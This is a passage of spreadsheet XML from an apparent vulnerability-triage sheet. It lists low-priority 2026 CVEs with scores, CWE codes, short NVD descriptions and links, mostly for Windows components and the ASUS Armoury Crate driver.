r="M1206" s="5" t="inlineStr" /><c r="N1206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1206" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1206" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1206" s="5" t="inlineStr" /><c r="R1206" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1206" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t></is></c></row><row r="1207"><c r="A1207" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1207" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1207" s="5" t="inlineStr"><is><t>CVE-2026-72978</t></is></c><c r="D1207" s="5" t="n"><v>5.9</v></c><c r="E1207" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1207" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1207" s="5" t="inlineStr" /><c r="H1207" s="5" t="n"><v>0.008</v></c><c r="I1207" s="5" t="inlineStr" /><c r="J1207" s="5" t="inlineStr" /><c r="K1207" s="5" t="inlineStr" /><c r="L1207" s="5" t="inlineStr" /><c r="M1207" s="5" t="inlineStr" /><c r="N1207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1207" s="5" t="inlineStr" /><c r="R1207" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1207" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in Active Directory Federation Services (AD FS) allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72978</t></is></c></row><row r="1208"><c r="A1208" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1208" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1208" s="5" t="inlineStr"><is><t>CVE-2026-73310</t></is></c><c r="D1208" s="5" t="n"><v>5.9</v></c><c r="E1208" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1208" s="5" t="inlineStr" /><c r="H1208" s="5" t="n"><v>0.004</v></c><c r="I1208" s="5" t="inlineStr" /><c r="J1208" s="5" t="inlineStr" /><c r="K1208" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1208" s="5" t="inlineStr" /><c r="M1208" s="5" t="inlineStr" /><c r="N1208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1208" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1208" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1208" s="5" t="inlineStr" /><c r="R1208" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1208" s="5" t="inlineStr"><is><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is></c><c r="T1208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73310</t></is></c></row><row r="1209"><c r="A1209" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1209" s="5" t="inlineStr"><is><t>CVE-2026-75809</t></is></c><c r="D1209" s="5" t="n"><v>5.9</v></c><c r="E1209" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1209" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1209" s="5" t="inlineStr" /><c r="H1209" s="5" t="n"><v>0.001</v></c><c r="I1209" s="5" t="inlineStr" /><c r="J1209" s="5" t="inlineStr" /><c r="K1209" s="5" t="inlineStr" /><c r="L1209" s="5" t="inlineStr" /><c r="M1209" s="5" t="inlineStr" /><c r="N1209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1209" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1209" s="5" t="inlineStr" /><c r="R1209" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1209" s="5" t="inlineStr"><is><t>Exposed IOCTL with insufficient access control in ASUS Armoury Crate allows a local user to disclosure information and disabling device functionality by bypassing driver authentication and using IOCTLs to read from and write to PCIe configuration space.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75809</t></is></c></row><row r="1210"><c r="A1210" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1210" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1210" s="5" t="inlineStr"><is><t>CVE-2026-78620</t></is></c><c r="D1210" s="5" t="n"><v>5.9</v></c><c r="E1210" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1210" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1210" s="5" t="inlineStr" /><c r="H1210" s="5" t="n"><v>0.003</v></c><c r="I1210" s="5" t="inlineStr" /><c r="J1210" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1210" s="5" t="inlineStr" /><c r="L1210" s="5" t="inlineStr" /><c r="M1210" s="5" t="inlineStr" /><c r="N1210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1210" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1210" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1210" s="5" t="inlineStr" /><c r="R1210" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S1210" s="5" t="inlineStr"><is><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is></c><c r="T1210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78620</t></is></c></row><row r="1211"><c r="A1211" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1211" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1211" s="5" t="inlineStr"><is><t>CVE-2026-16005</t></is></c><c r="D1211" s="5" t="n"><v>5.8</v></c><c r="E1211" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1211" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1211" s="5" t="inlineStr" /><c r="H1211" s="5" t="n"><v>0.001</v></c><c r="I1211" s="5" t="inlineStr" /><c r="J1211" s="5" t="inlineStr" /><c r="K1211" s="5" t="inlineStr" /><c r="L1211" s="5" t="inlineStr" /><c r="M1211" s="5" t="inlineStr" /><c r="N1211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1211" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1211" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1211" s="5" t="inlineStr" /><c r="R1211" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S1211" s="5" t="inlineStr"><is><t>Release of Invalid Pointer or Reference in Armoury Crate driver allows a local user to free arbitrary memory via a crafted IOCTL request by bypassing the driver's verification, which can corrupt data structures and cause a system crash (BSOD).Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16005</t></is></c></row><row r="1212"><c r="A1212" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1212" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1212" s="5" t="inlineStr"><is><t>CVE-2026-69559</t></is></c><c r="D1212" s="5" t="n"><v>5.8</v></c><c r="E1212" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1212" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1212" s="5" t="inlineStr" /><c r="H1212" s="5" t="n"><v>0.003</v></c><c r="I1212" s="5" t="inlineStr" /><c r="J1212" s="5" t="inlineStr" /><c r="K1212" s="5" t="inlineStr" /><c r="L1212" s="5" t="inlineStr" /><c r="M1212" s="5" t="inlineStr" /><c r="N1212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1212" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1212" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1212" s="5" t="inlineStr" /><c r="R1212" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S1212" s="5" t="inlineStr"><is><t>Origin validation error in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69559</t></is></c></row><row r="1213"><c r="A1213" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1213" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1213" s="5" t="inlineStr"><is><t>CVE-2026-75811</t></is></c><c r="D1213" s="5" t="n"><v>5.8</v></c><c r="E1213" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1213" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1213" s="5" t="inlineStr" /><c r="H1213" s="5" t="n"><v>0.001</v></c><c r="I1213" s="5" t="inlineStr" /><c r="J1213" s="5" t="inlineStr" /><c r="K1213" s="5" t="inlineStr" /><c r="L1213" s="5" t="inlineStr" /><c r="M1213" s="5" t="inlineStr" /><c r="N1213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1213" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1213" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1213" s="5" t="inlineStr" /><c r="R1213" s="5" t="inlineStr"><is><t>CWE-1256</t></is></c><c r="S1213" s="5" t="inlineStr"><is><t>Improper Restriction of Software Interfaces to Hardware Features in ASUS Armoury Crate allows a local user to modify hardware configuration settings and potentially cause hardware damage by bypassing driver authentication and accessing critical model-specific registers.Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75811</t></is></c></row><row r="1214"><c r="A1214" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1214" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1214" s="5" t="inlineStr"><is><t>CVE-2026-16006</t></is></c><c r="D1214" s="5" t="n"><v>5.7</v></c><c r="E1214" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1214" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1214" s="5" t="inlineStr" /><c r="H1214" s="5" t="n"><v>0.001</v></c><c r="I1214" s="5" t="inlineStr" /><c r="J1214" s="5" t="inlineStr" /><c r="K1214" s="5" t="inlineStr" /><c r="L1214" s="5" t="inlineStr" /><c r="M1214" s="5" t="inlineStr" /><c r="N1214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1214" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1214" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1214" s="5" t="inlineStr" /><c r="R1214" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1214" s="5" t="inlineStr"><is><t>Exposure of Sensitive System Information to an Unauthorized Control Sphere in Armoury Crate driver allows a local user to obtain kernel virtual addresses via a crafted IOCTL request by bypassing the driver's verification, potentially providing further insight into the kernel memory layout.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16006</t></is></c></row><row r="1215"><c r="A1215" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1215" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1215" s="5" t="inlineStr"><is><t>CVE-2026-18023</t></is></c><c r="D1215" s="5" t="n"><v>5.7</v></c><c r="E1215" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1215" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1215" s="5" t="inlineStr" /><c r="H1215" s="5" t="n"><v>0.001</v></c><c r="I1215" s="5" t="inlineStr" /><c r="J1215" s="5" t="inlineStr" /><c r="K1215" s="5" t="inlineStr" /><c r="L1215" s="5" t="inlineStr" /><c r="M1215" s="5" t="inlineStr" /><c r="N1215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1215" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1215" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1215" s="5" t="inlineStr" /><c r="R1215" s="5" t="inlineStr"><is><t>CWE-226</t></is></c><c r="S1215" s="5" t="inlineStr"><is><t>Sensitive Information in Resource Not Removed Before Reuse in ASUS Armoury Crate driver allows a local user to disclose sensitive information from uninitialized memory via a crafted IOCTL request that bypasses the driver's security verification mechanism.
Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18023</t></is></c></row><row r="1216"><c r="A1216" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1216" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1216" s="5" t="inlineStr"><is><t>CVE-2026-68874</t></is></c><c r="D1216" s="5" t="n"><v>5.7</v></c><c r="E1216" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1216" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1216" s="5" t="inlineStr" /><c r="H1216" s="5" t="n"><v>0.008</v></c><c r="I1216" s="5" t="inlineStr" /><c r="J1216" s="5" t="inlineStr" /><c r="K1216" s="5" t="inlineStr" /><c r="L1216" s="5" t="inlineStr" /><c r="M1216" s="5" t="inlineStr" /><c r="N1216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1216" s="5" t="inlineStr" /><c r="R1216" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1216" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68874</t></is></c></row><row r="1217"><c r="A1217" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1217" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1217" s="5" t="inlineStr"><is><t>CVE-2026-69317</t></is></c><c r="D1217" s="5" t="n"><v>5.7</v></c><c r="E1217" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1217" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1217" s="5" t="inlineStr" /><c r="H1217" s="5" t="n"><v>0.008</v></c><c r="I1217" s="5" t="inlineStr" /><c r="J1217" s="5" t="inlineStr" /><c r="K1217" s="5" t="inlineStr" /><c r="L1217" s="5" t="inlineStr" /><c r="M1217" s="5" t="inlineStr" /><c r="N1217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1217" s="5" t="inlineStr" /><c r="R1217" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1217" s="5" t="inlineStr"><is><t>Out-of-bounds read in Remote Desktop Client allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69317</t></is></c></row><row r="1218"><c r="A1218" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1218" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1218" s="5" t="inlineStr"><is><t>CVE-2026-69349</t></is></c><c r="D1218" s="5" t="n"><v>5.7</v></c><c r="E1218" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1218" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1218" s="5" t="inlineStr" /><c r="H1218" s="5" t="n"><v>0.008</v></c><c r="I1218" s="5" t="inlineStr" /><c r="J1218" s="5" t="inlineStr" /><c r="K1218" s="5" t="inlineStr" /><c r="L1218" s="5" t="inlineStr" /><c r="M1218" s="5" t="inlineStr" /><c r="N1218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1218" s="5" t="inlineStr" /><c r="R1218" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1218" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Management Instrumentation allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69349</t></is></c></row><row r="1219"><c r="A1219" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1219" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1219" s="5" t="inlineStr"><is><t>CVE-2026-69372</t></is></c><c r="D1219" s="5" t="n"><v>5.7</v></c><c r="E1219" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1219" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1219" s="5" t="inlineStr" /><c r="H1219" s="5" t="n"><v>0.008</v></c><c r="I1219" s="5" t="inlineStr" /><c r="J1219" s="5" t="inlineStr" /><c r="K1219" s="5" t="inlineStr" /><c r="L1219" s="5" t="inlineStr" /><c r="M1219" s="5" t="inlineStr" /><c r="N1219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1219" s="5" t="inlineStr" /><c r="R1219" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1219" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Network File System allows an authorized attacker to deny service over a network.</t></is></c><c r="T1219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69372</t></is></c></row><row r="1220"><c r="A1220" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1220" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1220" s="5" t="inlineStr"><is><t>CVE-2026-69393</t></is></c><c r="D1220" s="5" t="n"><v>5.7</v></c><c r="E1220" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1220" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1220" s="5" t="inlineStr" /><c r="H1220" s="5" t="n"><v>0.008</v></c><c r="I1220" s="5" t="inlineStr" /><c r="J1220" s="5" t="inlineStr" /><c r="K1220" s="5" t="inlineStr" /><c r="L1220" s="5" t="inlineStr" /><c r="M1220" s="5" t="inlineStr" /><c r="N1220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1220" s="5" t="inlineStr" /><c r="R1220" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1220" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69393</t></is></c></row><row r="1221"><c r="A1221" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1221" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1221" s="5" t="inlineStr"><is><t>CVE-2026-69405</t></is></c><c r="D1221" s="5" t="n"><v>5.7</v></c><c r="E1221" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1221" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1221" s="5" t="inlineStr" /><c r="H1221" s="5" t="n"><v>0.006</v></c><c r="I1221" s="5" t="inlineStr" /><c r="J1221" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1221" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1221" s="5" t="inlineStr" /><c r="M1221" s="5" t="inlineStr" /><c r="N1221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1221" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1221" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1221" s="5" t="inlineStr" /><c r="R1221" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1221" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69405</t></is></c></row><row r="1222"><c r="A1222" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1222" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1222" s="5" t="inlineStr"><is><t>CVE-2026-69416</t></is></c><c r="D1222" s="5" t="n"><v>5.7</v></c><c r="E1222" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1222" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1222" s="5" t="inlineStr" /><c r="H1222" s="5" t="n"><v>0.006</v></c><c r="I1222" s="5" t="inlineStr" /><c r="J1222" s="5" t="inlineStr" /><c r="K1222" s="5" t="inlineStr" /><c r="L1222" s="5" t="inlineStr" /><c r="M1222" s="5" t="inlineStr" /><c r="N1222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1222" s="5" t="inlineStr" /><c r="R1222" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1222" s="5" t="inlineStr"><is><t>Buffer over-read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69416</t></is></c></row><row r="1223"><c r="A1223" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1223" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1223" s="5" t="inlineStr"><is><t>CVE-2026-69507</t></is></c><c r="D1223" s="5" t="n"><v>5.7</v></c><c r="E1223" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1223" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1223" s="5" t="inlineStr" /><c r="H1223" s="5" t="n"><v>0.008</v></c><c r="I1223" s="5" t="inlineStr" /><c r="J1223" s="5" t="inlineStr" /><c r="K1223" s="5" t="inlineStr" /><c r="L1223" s="5" t="inlineStr" /><c r="M1223" s="5" t="inlineStr" /><c r="N1223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1223" s="5" t="inlineStr" /><c r="R1223" s="5" t="inlineStr"><is><t>CWE-538</t></is></c><c r="S1223" s="5" t="inlineStr"><is><t>Insertion of sensitive information into externally-accessible file or directory in Microsoft Windows Search Component allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69507</t></is></c></row><row r="1224"><c r="A1224" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1224" s="5" t="inlineStr"><is><t>CVE-2026-69552</t></is></c><c r="D1224" s="5" t="n"><v>5.7</v></c><c r="E1224" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1224" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1224" s="5" t="inlineStr" /><c r="H1224" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1224" s="5" t="inlineStr" /><c r="J1224" s="5" t="inlineStr" /><c r="K1224" s="5" t="inlineStr" /><c r="L1224" s="5" t="inlineStr" /><c r="M1224" s="5" t="inlineStr" /><c r="N1224" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1224" s="5" t="inlineStr" /><c r="R1224" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1224" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Windows Print Spooler Components allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69552</t></is></c></row><row r="1225"><c r="A1225" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1225" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1225" s="5" t="inlineStr"><is><t>CVE-2026-69569</t></is></c><c r="D1225" s="5" t="n"><v>5.7</v></c><c r="E1225" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1225" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1225" s="5" t="inlineStr" /><c r="H1225" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1225" s="5" t="inlineStr" /><c r="J1225" s="5" t="inlineStr" /><c r="K1225" s="5" t="inlineStr" /><c r="L1225" s="5" t="inlineStr" /><c r="M1225" s="5" t="inlineStr" /><c r="N1225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1225" s="5" t="inlineStr" /><c r="R1225" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1225" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Print Spooler Components allows an authorized attacker to deny service over a network.</t></is></c><c r="T1225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69569</t></is></c></row><row r="1226"><c r="A1226" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1226" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1226" s="5" t="inlineStr"><is><t>CVE-2026-69572</t></is></c><c r="D1226" s="5" t="n"><v>5.7</v></c><c r="E1226" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1226" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1226" s="5" t="inlineStr" /><c r="H1226" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1226" s="5" t="inlineStr" /><c r="J1226" s="5" t="inlineStr" /><c r="K1226" s="5" t="inlineStr" /><c r="L1226" s="5" t="inlineStr" /><c r="M1226" s="5" t="inlineStr" /><c r="N1226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1226" s="5" t="inlineStr" /><c r="R1226" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1226" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69572</t></is></c></row><row r="1227"><c r="A1227" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1227" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1227" s="5" t="inlineStr"><is><t>CVE-2026-69591</t></is></c><c r="D1227" s="5" t="n"><v>5.7</v></c><c r="E1227" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1227" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1227" s="5" t="inlineStr" /><c r="H1227" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1227" s="5" t="inlineStr" /><c r="J1227" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K122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227" s="5" t="inlineStr" /><c r="M1227" s="5" t="inlineStr" /><c r="N1227" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1227" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1227" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1227" s="5" t="inlineStr" /><c r="R1227" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1227" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows 